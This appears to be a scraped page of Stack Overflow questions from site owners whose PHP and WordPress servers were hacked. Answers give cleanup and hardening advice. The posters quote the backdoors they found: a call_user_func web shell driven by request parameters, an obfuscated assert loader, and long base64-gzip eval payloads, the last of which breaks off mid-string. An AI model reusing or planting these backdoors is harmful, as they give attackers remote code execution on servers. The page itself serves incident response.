We Keep Coding

What is this PHP file that's appeared on my server? [duplicate]

This question already has answers here:
wordpress hacked: what does this script actually do?
(2 answers)
Closed 4 years ago.
I have several web sites on a shared server, and have noticed a load of .php files appear in various folders, none of which were put there by me.
I am a .NET developer, so apart from one site which uses WordPress, none of my sites use PHP. Therefore, I can only assume that the server has been accessed, and suspicious files uploaded.
However, with my basic knowledge of PHP, I can't tell what these files are doing. I am hoping some PHP expert can help me.
Here is a sample...
<?php if(key($_GET)=='35')call_user_func($_GET['35'],$_REQUEST['c'],$_REQUEST['d']);
...and another...
<?php
$acnhe="s\x74\x72\x5fr\x65\x70\x6ca\x63e";$admno=$acnhe('f','',"b\x66afsfef6f4f_\x66dfefcfofd\x66e");$acnhe=$admno($acnhe('|','',$_POST['1043f']));$adnmo="\x61ss\145".'rt';#$adnmo($acnhe);#eval($acnhe);
$k=substr("class",2)."ert"; # $k(${"_PO"."ST"} ['335']);
Anyone able to explain what these would do if/when called?

Your wordpress site has been compromised. It's quite common that unpatched security vulnerabilities in WP allow users to inject these kinds of files which end up causing all sorts of trouble to your visitors (by redirecting them to malicious sites, for example).
You can safely delete this file, and you should do it ASAP.
Also, it's time to secure your WP installation (update the core to the latest version) and go through all of WP's core php files and look for similar strings within them (these malicious exploits sometimes allow core WP files to get injected too) and clean them up.

Hide PHP source code on local server [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 4 years ago.
Improve this question
I have a management system built in PHP that will run locally on multiple computers. I want to hide the source code from the user of the system. I do not want to share the code but only the application.
The user can view the application, use it and can also make changes but I don't want the user to get access to the PHP files or any other project files as they are placed in htdocs (Xampp) and www (wamp) folder.
I have searched so far and I couldn't find out but only some decoders:
ionCube
Zend Guard
PHP Obfuscator

I would suggest mounting this on a local webserver instead and asking the users to access this over a network connection in thier browser rather than directly from localhost. This way, the code will be isolated on the webserver, and as long as you don't "share" the root folder on the network, they won't be able to see the source files in any way.
If you must encrypt the code, then you've already seen the 2 most popular ways of encoding. Xampp can be configured to use IonCube and ZendGuard. Just ensure that you encode it in a way that can be decoded on the client machine (you can encode to differing PHP versions)

As #Edmondscommerce stated, I think the most viable option is to host it externally. This could be in a local network so that you don't have to host it online. There are many disadvantages to run and store your files locally (each client will have to run a webserver, updates will be disastrous and you, rightly so, have security concerns).
That said, if it has to run locally, there are still some ways to hide the contents of the files depending on the user(s) of the system. If the user is not an admin and you do have those rights, you could set the the server files to inaccessible using the local OS' methods (I.e. revoke read and write rights). Be sure that the webserver will have to be given at least read access to the files in order to serve them to the local user.

you can put your source code in some where hidden in the host and change the server root path form "C:\xampp\htdocs" to your new one.

Malicious code added without modifying my PHP files [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 9 years ago.
Improve this question
I just discovered that every website in my hosting account (which is a shared hosting) is infected with malicious code.
The malicious code is a < script> tag appended after the < /html> tag. It redirects to a russian website.
The problem is this: my PHP files are not compromissed. I downloaded them via FTP, and they are fine. The "last modified" dates are fine too (some files are from 2012). Even if I upload a brand new PHP file, when I access it through the web, it's infected. But if I download it again via FTP, it´s fine.
It's like some .htaccess rule is appending the malicious code to all my PHP pages AFTER they pass through the PHP engine, or something like that (but my .htaccess files are fine too).
What could be the problem? Is the hosting provider compromised, or is it my account? What can I do to solve this problem? Google is already sending me malware notifications, and the support guys are slow as hell.
Thanks for your time, and please forgive my poor english.
Edit: Adding < ?php exit() ?> to the end of any PHP file stops the infection, so this seems to be a PHP problem.

Yeah, wouldn't hurt to change your ftp password, also look for files that aren't yours or part of the installation. I've had issue like that before and there were scripts in the images directory that I didn't put there. I removed them. Change any files so that they aren't world writeable. e.g. change from 666 to 644. Do the same to directories, 777 to 755. If the files and directories are owned by the ftp user the lesser permissions should be fine.
Then maybe try this to clean up or get your host to do it if you don't have access.
http://cachecrew.com/fixing-an-infected-php-web-server/

The first thing I would do, is change the FTP password, and run an anti-virus on the computer you are using to access the FTP.
Something like this has happened to me before, and the point of intrusion on the web server was trough the stealing of the FTP user and password trough a trojan.
About the PHP files, and in the start of the file, aren't their any strange tag?
In my case, the files were updated on the start on the file, and it wasn't only PHP files, HTML files were also affected.
The script tag that appear after the tag, could be inserted their trough Javascript. And don't rely on the date modified ( check this answer )

Websites hosted on different servers being hacked 'again and again' with same base64 malware codes [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 9 years ago.
Improve this question
My Websites hosted on different servers being hacked again and again with same base64 malware codes. When I decoded the base64 code I got the link to mbrowserstats.com/statH/stat.php.
Please note: My websites with core php and also wordpress are being hacked. They are placing base64 malware codes in following files - index.php, main.php, footer.php, template files of wordpress (index.php, main.php, footer.php), index.php files in wp-admin, plugins, themes folders etc.
I have already tried below things but all websites are being hacked again and again.
Changed all ftp passwords
Changed ftp client fileZilla to winSCP
Removed all malware codes and re-upload all files to server
Uploaded old backup files without malware codes
Disabled magic_quotes_gpc, register_globals, also exec & shell_exec functions
Used index files to prevent direct folder access
Used mysql_real_escape_string function to sanitize data for insert queries in php websites
Updated WordPress and also all Plugins to latest version
Installed malwarebytes anti-malware and scanned my computer for malwares (Full Scan)
Confirmed that my websites are not using timthumb.php file
Changed file permissions (755 for folders & 644 for files). Now only image upload folders have 777 permission.
When I checked the websites' visitor details I found some IPs like 150.70.172.111 / 150.70.172.202, Hostname:150-70-172-111.trendmicro.com, Country - Japan. They accessed websites in close times to the time that of modified files (malware injected files).
Additional Information: I'm using Trend Micro antivirus from last 1 year. I'm wondering that the IPs with hostname 'trendmicro.com' have any relation with hacking or in stealing my ftp passwords.
I suspect that they are using ftp access to insert malware codes. Also the time between file modifications is very low. They have updated all files within seconds. So I think they are using a program for that. Manually they cannot edit all files within seconds as I have so many files in different folders of same website.
Please help me to resolve this issue. I have tried many things but it happens again. Thanks

It's tricky to handle this. One of the common ways this happens is that on a shared server a malicious user can use another account and insert a file in your upload directory (which is often world writeable on shared servers) by going down and back up the filesystem. It's not really an issue of passwords being cracked. Things you can do:
Use a private/virtual server- just not the standard shared type with more than one user in the same filesytem
Keep WordPress updated
Check all your theme and plugins for online notices of vulnerabilities. A big one is that many themes use timthumb.php for image resize which had a big security hole last year. You can continue using it but make sure to replace it with the current version.
For hosting I highly recommend using something such as http://WPEngine.com as you will not only get a private experience but they will also be more top of security scans than standard hosting companies.
Also if your site has been hacked you must be very very careful to remove all backdoors - I recommend doing a clean install which is obviously tough since you have to put your theme back and that can contain backdoors as well. Malicious users will create multiple backdoors in case one gets taken down. There are a few scripts online that will scan for these but none that is perfect. Making a cleab install, then backing it up offline in case of a hack is a good option.

Multiple sites hacked, same MO but no cure [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 9 years ago.
Improve this question
We've been having some troubles with cracked sites lately.
We've found several files on our sites (who are on a shared hosting platform) that don't belong there. These files are usually .txt or image files (it was a .js file once) that then get included in existing php files, effectively running them on the server.
The php code is something like this:
<?php eval(gzuncompress(base64_decode('eF6VWNtu40YM/ZU...
Well it really just goes on from there.
From what I understand so far, the above code opens some kind of shell.
We also have sites that are infected who have links to various porn/advertising sites added to the bottom of the page. Although I don't think it's the same code (as the snippet above) that adds these links to the page. I have yet to find the source of these alterations.
Most of these attacks occur on Drupal sites, some of them are upgraded to the latest version of everything (modules + core) and still show signs of attacks.
The attacks aren't limited to Drupal sites however, there are normal php sites that where cracked as well.
I know the first step would be to check the server logs, I've requested them but I do not have them yet.
I was wondering if anyone could give me some pointers as to what I should look for or what the next "obvious" steps to take are. (I've already changed the db and ftp passwords).
I have used the following snippet to track down some of the files:
grep -nRH --exclude=*.js 'eval(' *
I also ran that piece of code without excluding javascript files and I've deleted all of the attacker's files I could find.
I'd be happy to provide any additional information that could help solve this issue.
EDIT: the source code of the files:
<?php eval(gzuncompress(base64_decode('eF6VWNtu40YM/ZU+LOBdoChsaV1AKPJgP6wMYZvCLqpbsQgsyYmbyK4QX+Wv7/BQF3dDjjcvI0XkcMhD8gydD/7XP6aTr3/+PXg4PAy+3U1eX5f1x2y5W/36+aFY5f8Wq4+DwU+/DNI4qDM3eMw34ck8h8uIvo63g08/f6edbkkSHhKXnosqc8b08pjG6yp3F5e3O0hsJPSoMz88yBrplmxCq8podcZkE3/ntIq2041HslMafb7TfJ2OitnvknRzvyN55t6X0l7jD5/b+ANEOE58R/y0SH7R942n+UXSbUBriTOiuehfuePc3FerzV9KBMZ72HkrXdL3eFIjRt87wNaJ1jvBVpMlaJsqcHR7xha9NfYkW4mpJpImcUmPx3wWXuhlObnD8dIOEgS12fHInoR7Id5o/CKfRvuQFXPScqLFeH1K7tO7dxLtkahGZkjTWVfpdq557qxrGc0MFRIIHstxLKPRyWD7Alznkv/FLKiyuYZhPgvKdOTVaTzdcVXRItU2IwVtRIodkVZH9t41VUrSHWo6BKaws/LLi9x3JC6AfrlHrLSI8XYdEI3oYVhppPjYsAexkelQUlpXXEcSayRuyBHR+sWrsk05tGh98S6dn7C9ODKCak0g82FjH5hceLfZOZN6nZkmxFlpDLw1zd4rel6uvULEM8CpetbHxDjxWbxT20Wfk967o67Z2qelQddUQvgsarb4P0PbN7b12r55f5g+3GeOiBiYm6RARuM+7gdUZBIvnnWuYoSNNj3+twMbNPu0GH7NmT2Fqsz5RgF2he/tgI5blPmTZDPv+3ff+GuNjN5uaV/xQhsVPRTtgnlyl1J+KYPAdyF0Z+MFPWCbmVX1gj04A4cIPg9lPqT7KmaWLZnPz+vEkW5KsklynG5OpvcmX1qW3WndTEHDVMzAEnchcD3I9yDnPPznOv+xc38s6D0aC5wDTedcpvFEiRd21BpCTTrowSFiNF3FXBuMk2jxotSSvS6v7hVURaTeKcjFlJYa0wLj13mj4IhqwFxhmSk4HyYXpPKEpIk5IcmPzChtbn4sLy079B0BD3ix9jtXiMRaOaSipPXJNXWNfFNd04tU2/Q9A9Lz0VtpFklfESlPQ3zDmh7mKVfr36LRNrPLcyZqdXwQIeOaFk4OwBpGg/6SbdlPskn5fHNTBVUCXM7K/NznSP1V4pyPyZM6tap3jvFhZ6r1Vbaq7wPSXIWW/blrZitfmpDflSVmbTXrJgbCkOQGR9AxZioZS3h+hTziRCS2DLzx5obP9OiqS60dxgD5YxwsVXZbC31KMh+8qlSKpZvRueEwcbzj0iklP3xcTnvL/EPfmxlIZ2pzAklG2VatrbY+mJWAJHCnRb2/DYfArowNMxQtnuCTzD8NYogns+Pazw3t7xQpR+1M1vyiQVa730Hyjm4iqO2adrZhVIOO9YCmqNlwtIok0Ldk97tqfbenehY5G9354mza9YCSJ0j1XNPS1i/saFHK9dJMKLL+bUSV/0rpPnf/CYGvtLwflfb8rO81eQoAKrjrfbAs/unV3Pe0qJMvV3A/IdyYfG394xh+IjXiKDwlniIBbie/vOKqT7/9BzrVvS4='))); ?><?php eval(gzuncompress(base64_decode('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